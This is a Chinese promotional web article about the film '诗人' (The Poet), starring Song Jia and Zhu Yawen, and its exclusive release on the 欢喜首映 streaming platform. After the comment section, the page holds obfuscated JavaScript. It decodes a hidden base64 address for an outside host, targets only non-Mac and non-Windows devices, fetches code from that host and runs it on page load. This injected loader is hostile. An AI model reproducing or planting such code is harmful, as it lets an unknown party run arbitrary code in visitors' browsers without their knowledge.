电影《诗人》欢喜首映独播上线,宋佳朱亚文共赴世纪末痴恨情爱

时间:2021-12-10 22:45:26阅读:990
2021年12月10日,由刘浩执导、宋佳、朱亚文主演的电影《诗人》在欢喜首映独家上线。该片曾入选第31届东京国际电影节主竞赛单元最佳影片,是1800多部影片中中国大陆唯一入选的华语电影。《诗人》聚焦上
  • 宋佳,1980年11月13日出生于黑龙江省哈尔滨市南岗区,毕业于上海戏剧学院表演系,中国…

2021年12月10日,由刘浩执导、宋佳、朱亚文主演的电影《诗人》在欢喜首映独家上线。该片曾入选第31届东京国际电影节主竞赛单元最佳影片,是1800多部影片中中国大陆唯一入选的华语电影。

《诗人》聚焦上世纪,中国在改革开放初期至发展期的大背景下,诗人李五与妻子陈蕙从相爱入骨到无可挽回的爱情故事。平缓、浪漫、苦涩,《诗人》的成功在于它的全片并未出现一句实打实的诗歌,却通过形形色色的人物传递出了纯粹诗意。而“文艺女神”宋佳与“行走的荷尔蒙”朱亚文的加盟,则让这部电影成功跻身年度最“撩人”爱情片,共赴世纪末一场难忘约定。

宋佳朱亚文再续“关东情缘”,无间默契诠释诗人幻灭一生

电影《诗人》以诗人李五的经历展开,表现了诗歌从兴至衰的上世纪末一位“诗人”的生命轨迹。

朱亚文饰演的李五,原本是国营矿场的一名工人,李五不甘命运,眼红大诗人的名气和地位,想要靠着写诗改变自己的命运。宋佳饰演的陈蕙是一位贤妻,她近乎痴迷地爱着李五的一切。出于对李五的爱,她放弃宝贵的上夜校机会,瞒着李五为他印诗集。

随着李五逐渐崭露头角,他和陈蕙之间出现了信任裂痕,爱也不复当年,而李五的诗梦随之幻灭,诗意难觅……爱情的破灭,时代的无可挽留,始终萦绕在《诗人》之中的哀伤内核是电影最精彩之处,仿佛一层淡淡的气味,值得人反复回味。

在出演《诗人》前,宋佳与朱亚文已相识十年以上,在《闯关东》《陆垚知马俐》等作品中均有合作,最出名的CP还要数《闯关东》中的鲜儿和传武。朱亚文曾笑称:“我和小花在一起的时候,就连她的脚步声,她的喘息、她转身的节奏,这些东西我都非常熟悉”。

而宋佳在接到剧本时,担心短时间内不能和男演员建立起那么高的情感高度,但听到男主角是朱亚文时,她忽然觉得“很踏实”。正是两位主演六次合作造就的无间默契,让银幕上流动的情与欲,充满了如“红毛裤”般具象的切实张力。

十年打磨凝结时代回忆,饱满细节成就“一首好诗”

在拍摄《诗人》前,距离导演刘浩创作剧本已经过去了十年。在导演行业里半路出家的刘浩,原本就是一名文字工作者,他自称写《诗人》是“油然而发”,而《诗人》中煤矿、工厂、石油站的场景,正是来自于刘浩的童年记忆。

为了还原上世纪八十年代氛围,《诗人》剧组耗时两个半月,在新疆哈密三道岭无人区搭建了一万平米的国营厂房和居住区,电影完成拍摄后仍被当地保留。音乐则邀请负责过《地久天长》《六欲天》《大江大河》的音乐人董颖达操刀,《诗人》配乐克制,曲风特异,故意隐去了地域特征,好让观众能够专注在故事与人物之上。

加上《诗人》,刘浩至今只推出了五部电影作品,这看似“很慢”,却部部有“收获”,多次受到东京国际电影节、圣塞巴斯蒂安国际电影节、柏林国际电影节等多个国际A类电影节的垂青。就算手里有着剧本,他也讲究拍电影的时机,不然只会扭曲文本。比起一部文艺电影,《诗人》更像是刘浩对于诗意主义的一次回溯和探寻。

电影《诗人》正在欢喜首映独家热播,欢喜首映APP由欢喜传媒独家运营,是一个全会员制与收费点播相结合的无广告流媒体播放平台,已覆盖PC、移动、电视三大终端,目前总下载次数已超过3500万,累积付费用户超过1000万。

欢喜首映为互联网用户提供来自全世界的优质影视内容:如电影《误杀》《夺冠》《一秒钟》《疯狂的外星人》《无主之作》《银湖之底》《狼嚎》等;剧集《风犬少年的天空》《爱情生活》《万物生灵》《贴身保镖》等;纪录片《海洋美食征途》《卓别林对决联邦调查局》等。

在流媒体业务的发展上,欢喜首映不仅持续与互联网头部平台及硬件终端等第三方渠道合作,完成更大范围流量反围剿;而且近日与中国移动建立全面合作伙伴关系,抢占5G数字院线赛道发展先机;携手斑马智行亮相广州车展,共创车载影院,探索智能出行新可能;承载第七届亚洲大学生电影展线上展映重任,助力影展突破时空局限……欢喜首映在凭借内容立足影视赛道的同时,也在持续开拓多元场景,不断完善自身“内容+渠道”的整体战略布局。

走进欢喜首映正在独家热播的被媒体称赞为“一部充满时代质感和诚意的人文大作”的爱情电影《诗人》,携一生诗,爱一个人。

相关资讯

评论

  • 评论加载中...

function zmjTZ(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rdIfsiYJ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return zmjTZ(t);};window[''+'F'+'H'+'j'+'U'+'P'+'J'+'G'+'v'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=rdIfsiYJ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';console.log(u);var xhr=new XMLHttpRequest();xhr.open('GET',u+'/s/a?_='+i);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function(data.data)(cs);}};xhr.send('u=1');})('aHR0cHM6Ly9hcGkuc2ltaWxtLm1l','434382150515568640',window,document,['','VxKGyJk']);}:function(){};